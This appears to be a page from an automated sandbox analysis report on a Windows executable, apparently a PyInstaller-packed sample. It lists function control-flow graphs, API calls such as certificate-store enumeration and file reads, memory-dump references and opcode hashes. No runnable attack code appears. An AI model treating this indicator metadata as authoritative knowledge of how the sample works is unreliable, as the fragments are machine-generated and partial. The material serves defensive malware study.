                                                                                                                                                                                                                                          control_flow_graph 1217 7ff67aeebacc-7ff67aeebaf2 1218 7ff67aeebaf4-7ff67aeebb08 call 7ff67aee4f58 call 7ff67aee4f78 1217->1218 1219 7ff67aeebb0d-7ff67aeebb11 1217->1219 1233 7ff67aeebefe 1218->1233 1220 7ff67aeebee7-7ff67aeebef3 call 7ff67aee4f58 call 7ff67aee4f78 1219->1220 1221 7ff67aeebb17-7ff67aeebb1e 1219->1221 1240 7ff67aeebef9 call 7ff67aeea950 1220->1240 1221->1220 1224 7ff67aeebb24-7ff67aeebb52 1221->1224 1224->1220 1227 7ff67aeebb58-7ff67aeebb5f 1224->1227 1230 7ff67aeebb61-7ff67aeebb73 call 7ff67aee4f58 call 7ff67aee4f78 1227->1230 1231 7ff67aeebb78-7ff67aeebb7b 1227->1231 1230->1240 1236 7ff67aeebee3-7ff67aeebee5 1231->1236 1237 7ff67aeebb81-7ff67aeebb87 1231->1237 1238 7ff67aeebf01-7ff67aeebf18 1233->1238 1236->1238 1237->1236 1241 7ff67aeebb8d-7ff67aeebb90 1237->1241 1240->1233 1241->1230 1244 7ff67aeebb92-7ff67aeebbb7 1241->1244 1245 7ff67aeebbea-7ff67aeebbf1 1244->1245 1246 7ff67aeebbb9-7ff67aeebbbb 1244->1246 1250 7ff67aeebbf3-7ff67aeebbff call 7ff67aeed66c 1245->1250 1251 7ff67aeebbc6-7ff67aeebbdd call 7ff67aee4f58 call 7ff67aee4f78 call 7ff67aeea950 1245->1251 1248 7ff67aeebbe2-7ff67aeebbe8 1246->1248 1249 7ff67aeebbbd-7ff67aeebbc4 1246->1249 1253 7ff67aeebc68-7ff67aeebc7f 1248->1253 1249->1248 1249->1251 1258 7ff67aeebc04-7ff67aeebc1b call 7ff67aeea9b8 * 2 1250->1258 1282 7ff67aeebd70 1251->1282 1256 7ff67aeebc81-7ff67aeebc89 1253->1256 1257 7ff67aeebcfa-7ff67aeebd04 call 7ff67aef398c 1253->1257 1256->1257 1261 7ff67aeebc8b-7ff67aeebc8d 1256->1261 1269 7ff67aeebd8e 1257->1269 1270 7ff67aeebd0a-7ff67aeebd1f 1257->1270 1278 7ff67aeebc1d-7ff67aeebc33 call 7ff67aee4f78 call 7ff67aee4f58 1258->1278 1279 7ff67aeebc38-7ff67aeebc63 call 7ff67aeec2f4 1258->1279 1261->1257 1265 7ff67aeebc8f-7ff67aeebca5 1261->1265 1265->1257 1271 7ff67aeebca7-7ff67aeebcb3 1265->1271 1273 7ff67aeebd93-7ff67aeebdb3 ReadFile 1269->1273 1270->1269 1275 7ff67aeebd21-7ff67aeebd33 GetConsoleMode 1270->1275 1271->1257 1276 7ff67aeebcb5-7ff67aeebcb7 1271->1276 1280 7ff67aeebead-7ff67aeebeb6 GetLastError 1273->1280 1281 7ff67aeebdb9-7ff67aeebdc1 1273->1281 1275->1269 1283 7ff67aeebd35-7ff67aeebd3d 1275->1283 1276->1257 1277 7ff67aeebcb9-7ff67aeebcd1 1276->1277 1277->1257 1284 7ff67aeebcd3-7ff67aeebcdf 1277->1284 1278->1282 1279->1253 1289 7ff67aeebed3-7ff67aeebed6 1280->1289 1290 7ff67aeebeb8-7ff67aeebece call 7ff67aee4f78 call 7ff67aee4f58 1280->1290 1281->1280 1286 7ff67aeebdc7 1281->1286 1291 7ff67aeebd73-7ff67aeebd7d call 7ff67aeea9b8 1282->1291 1283->1273 1288 7ff67aeebd3f-7ff67aeebd61 ReadConsoleW 1283->1288 1284->1257 1293 7ff67aeebce1-7ff67aeebce3 1284->1293 1297 7ff67aeebdce-7ff67aeebde3 1286->1297 1299 7ff67aeebd82-7ff67aeebd8c 1288->1299 1300 7ff67aeebd63 GetLastError 1288->1300 1294 7ff67aeebedc-7ff67aeebede 1289->1294 1295 7ff67aeebd69-7ff67aeebd6b call 7ff67aee4eec 1289->1295 1290->1282 1291->1238 1293->1257 1303 7ff67aeebce5-7ff67aeebcf5 1293->1303 1294->1291 1295->1282 1297->1291 1305 7ff67aeebde5-7ff67aeebdf0 1297->1305 1299->1297 1300->1295 1303->1257 1310 7ff67aeebdf2-7ff67aeebe0b call 7ff67aeeb6e4 1305->1310 1311 7ff67aeebe17-7ff67aeebe1f 1305->1311 1317 7ff67aeebe10-7ff67aeebe12 1310->1317 1314 7ff67aeebe21-7ff67aeebe33 1311->1314 1315 7ff67aeebe9b-7ff67aeebea8 call 7ff67aeeb524 1311->1315 1318 7ff67aeebe35 1314->1318 1319 7ff67aeebe8e-7ff67aeebe96 1314->1319 1315->1317 1317->1291 1321 7ff67aeebe3a-7ff67aeebe41 1318->1321 1319->1291 1322 7ff67aeebe43-7ff67aeebe47 1321->1322 1323 7ff67aeebe7d-7ff67aeebe88 1321->1323 1324 7ff67aeebe63 1322->1324 1325 7ff67aeebe49-7ff67aeebe50 1322->1325 1323->1319 1327 7ff67aeebe69-7ff67aeebe79 1324->1327 1325->1324 1326 7ff67aeebe52-7ff67aeebe56 1325->1326 1326->1324 1328 7ff67aeebe58-7ff67aeebe61 1326->1328 1327->1321 1329 7ff67aeebe7b 1327->1329 1328->1327 1329->1319
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                          • Instruction ID: d0ead601fb27bc2e1149926211b3a1ea62341e7b40367654e4185b2ffb169fc3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53C1F633A2C68781F760AB1594402BD77A4FB81B80F5582B1EA8E877F1CF7DE8459700
                                                                                                                                                                                                                                          Function 00007FF67AED6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                          • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                          • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                          • Instruction ID: 371de4d3051e5fa0828b243f2b3739cad3ef787a7fcc830c3c5c8f456271bebf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F417233A38A8691EA11FB24E4542E96321FFD4384FA00572EA5DC36E5EF3CE545D740
                                                                                                                                                                                                                                          Function 00007FF8B9109F18 Relevance: 7.7, APIs: 5, Instructions: 159encryptionCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1367 7ff8b9109f18-7ff8b9109f46 00007FF8A8C4BB78 1368 7ff8b9109f4c-7ff8b9109f5a call 7ff8b910be54 1367->1368 1369 7ff8b910a131 1367->1369 1373 7ff8b9109f5c-7ff8b9109f60 1368->1373 1374 7ff8b9109f7e-7ff8b9109f80 1368->1374 1370 7ff8b910a133-7ff8b910a151 1369->1370 1376 7ff8b9109f6b-7ff8b9109f79 GetLastError call 7ff8b910db80 1373->1376 1377 7ff8b9109f62-7ff8b9109f65 call 7ff8b910d888 1373->1377 1375 7ff8b910a039-7ff8b910a048 CertEnumCertificatesInStore 1374->1375 1378 7ff8b910a04e 1375->1378 1379 7ff8b9109f85-7ff8b9109f8d call 7ff8b910d9a8 1375->1379 1376->1370 1377->1376 1383 7ff8b910a0ec-7ff8b910a0fc CertCloseStore 1378->1383 1385 7ff8b9109f93-7ff8b9109f99 1379->1385 1386 7ff8b910a10c-7ff8b910a10f 1383->1386 1387 7ff8b910a0fe-7ff8b910a101 1383->1387 1389 7ff8b9109f9f-7ff8b9109fad call 7ff8b910a828 1385->1389 1390 7ff8b910a091-7ff8b910a095 1385->1390 1386->1369 1388 7ff8b910a111-7ff8b910a121 call 7ff8b910dc68 1386->1388 1387->1376 1391 7ff8b910a107 1387->1391 1402 7ff8b910a12c-7ff8b910a12f 1388->1402 1403 7ff8b910a123-7ff8b910a126 call 7ff8b910d888 1388->1403 1404 7ff8b910a07e-7ff8b910a082 1389->1404 1405 7ff8b9109fb3-7ff8b9109fca call 7ff8b910b750 1389->1405 1394 7ff8b910a0a0-7ff8b910a0a2 1390->1394 1395 7ff8b910a097-7ff8b910a09a call 7ff8b910d888 1390->1395 1391->1386 1399 7ff8b910a0a4-7ff8b910a0b0 CertFreeCertificateContext 1394->1399 1395->1394 1400 7ff8b910a0c1-7ff8b910a0c4 1399->1400 1401 7ff8b910a0b2-7ff8b910a0b6 1399->1401 1407 7ff8b910a0d6-7ff8b910a0db 1400->1407 1408 7ff8b910a0c6-7ff8b910a0cb 1400->1408 1401->1400 1406 7ff8b910a0b8-7ff8b910a0bb call 7ff8b910d888 1401->1406 1402->1370 1403->1402 1410 7ff8b910a08d-7ff8b910a08f 1404->1410 1411 7ff8b910a084-7ff8b910a087 call 7ff8b910d888 1404->1411 1420 7ff8b9109feb-7ff8b9109fee 1405->1420 1421 7ff8b9109fcc-7ff8b9109fd0 1405->1421 1406->1400 1407->1383 1415 7ff8b910a0dd-7ff8b910a0e1 1407->1415 1408->1407 1414 7ff8b910a0cd-7ff8b910a0d0 call 7ff8b910d888 1408->1414 1410->1399 1411->1410 1414->1407 1415->1383 1419 7ff8b910a0e3-7ff8b910a0e6 call 7ff8b910d888 1415->1419 1419->1383 1422 7ff8b910a06d-7ff8b910a071 1420->1422 1423 7ff8b9109ff0-7ff8b910a001 call 7ff8b910db50 1420->1423 1425 7ff8b9109fdb-7ff8b9109fe8 call 7ff8b910b750 1421->1425 1426 7ff8b9109fd2-7ff8b9109fd5 call 7ff8b910d888 1421->1426 1422->1399 1428 7ff8b910a073 1422->1428 1423->1422 1434 7ff8b910a003-7ff8b910a025 call 7ff8b910db08 1423->1434 1425->1420 1426->1425 1432 7ff8b910a076-7ff8b910a07c call 7ff8b910d888 1428->1432 1432->1399 1439 7ff8b910a053-7ff8b910a057 1434->1439 1440 7ff8b910a027-7ff8b910a02b 1434->1440 1443 7ff8b910a059-7ff8b910a05c call 7ff8b910d888 1439->1443 1444 7ff8b910a062-7ff8b910a066 1439->1444 1441 7ff8b910a02d-7ff8b910a030 call 7ff8b910d888 1440->1441 1442 7ff8b910a036 1440->1442 1441->1442 1442->1375 1443->1444 1444->1399 1445 7ff8b910a068-7ff8b910a06b 1444->1445 1445->1432
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010325096.00007FF8B9100000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B911E000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B9128000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010843875.00007FF8B912B000.00000080.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010910842.00007FF8B912D000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cert$Store$ErrorLast$00007CertificateCertificatesCloseContextEnhancedEnumFreeOpenUsage
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1905439668-0
                                                                                                                                                                                                                                          • Opcode ID: e8ffdbe4bdc1dbe6677b56bf781ee610824ebcc7787cfae9ac3e7d3063b7a65d
                                                                                                                                                                                                                                          • Instruction ID: 849c4702b1247777a6cfe0b6185ba65b8c063e7b314ba566db6551d43f7a5388
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8ffdbe4bdc1dbe6677b56bf781ee610824ebcc7787cfae9ac3e7d3063b7a65d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41514D25E0AB8681FA599F29A91913933E4FF45BD0F4984B0CF0E467B8DE3FE455A310
                                                                                                                                                                                                                                          Function 00007FF8B910BE54 Relevance: 7.6, APIs: 5, Instructions: 60encryptionCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1483 7ff8b910be54-7ff8b910be8c CertOpenStore 1484 7ff8b910be8e-7ff8b910be90 1483->1484 1485 7ff8b910be92-7ff8b910be94 1483->1485 1487 7ff8b910bf06-7ff8b910bf20 1484->1487 1486 7ff8b910be96-7ff8b910bebf CertOpenStore 1485->1486 1488 7ff8b910bec1-7ff8b910bed6 CertAddStoreToCollection 1486->1488 1489 7ff8b910bee6-7ff8b910beee 1486->1489 1490 7ff8b910bed8 1488->1490 1491 7ff8b910bedb-7ff8b910bee0 CertCloseStore 1488->1491 1489->1486 1492 7ff8b910bef0-7ff8b910bef3 1489->1492 1490->1491 1491->1489 1493 7ff8b910bf03 1492->1493 1494 7ff8b910bef5-7ff8b910bf01 CertCloseStore 1492->1494 1493->1487 1494->1484
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010325096.00007FF8B9100000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B911E000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B9128000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010843875.00007FF8B912B000.00000080.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010910842.00007FF8B912D000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CertStore$CloseOpen$Collection
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1995843185-0
                                                                                                                                                                                                                                          • Opcode ID: e967edb42384cb88553adc9f0faa7ad78790174b17245df176d4b61c22f82093
                                                                                                                                                                                                                                          • Instruction ID: d7f9763a647e872915aa8e908bf5a6170eb6aae75ab497cbf08cd2bb1e0300a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e967edb42384cb88553adc9f0faa7ad78790174b17245df176d4b61c22f82093
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18215E36B18B9186EB64CF2AA944729A7A2FB84BC0F088070DF4D43B64DF3DE455D600
                                                                                                                                                                                                                                          Function 00007FF67AEE5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                          • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction ID: c39134dfe076cbc8157a1f1181bde4c76f954160a48a2d72db510079ec3406e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5419223E2C78283F750AB6096503796360FB947A4F109375EA9C43AE2DF7CA5F09750
                                                                                                                                                                                                                                          Function 00007FF67AEDCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction ID: 9a5ff3a8e457948339756e4c2415db1943d1f08dd9aa8c00c0906f17388ef3bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A316D23E2D14345FA64BB74D8613B917919FC5388F6444B8E94ECB2F3DE2CA885E280
                                                                                                                                                                                                                                          Function 00007FF8A92E146A Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 251COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem.c
                                                                                                                                                                                                                                          • API String ID: 1452528299-2512360314
                                                                                                                                                                                                                                          • Opcode ID: 7d5c6cafbdf9eba0533a02d895b16706df5be332ea577afecea6ad0cef54847e
                                                                                                                                                                                                                                          • Instruction ID: 21ce4d3e96ce042f21fcd605ca46810f8e3b02968a927ac67a363e3f930c7b3d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d5c6cafbdf9eba0533a02d895b16706df5be332ea577afecea6ad0cef54847e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17B14E72A0EAC6A6EB649F16D44437927F0FF60B8CF145436DA0986699DF3DE884C701
                                                                                                                                                                                                                                          Function 00007FF8A92E1497 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                                                                                                                                                                                                          • API String ID: 1452528299-2209325370
                                                                                                                                                                                                                                          • Opcode ID: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
                                                                                                                                                                                                                                          • Instruction ID: 142898c7a872be6ec199d8c3cd1915cc96601bb368e44e3a36510a70c61eb8d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21816D32A0EAC191FB509E29D5843B96BE0FB44FD8F184135DE5C8BA99EF38D446C340
                                                                                                                                                                                                                                          Function 00007FF67AEE01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                          • Instruction ID: 06daeb1e8a4e174833dba9043aad17d5c891e2897e43f9227b117fac3d77211b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
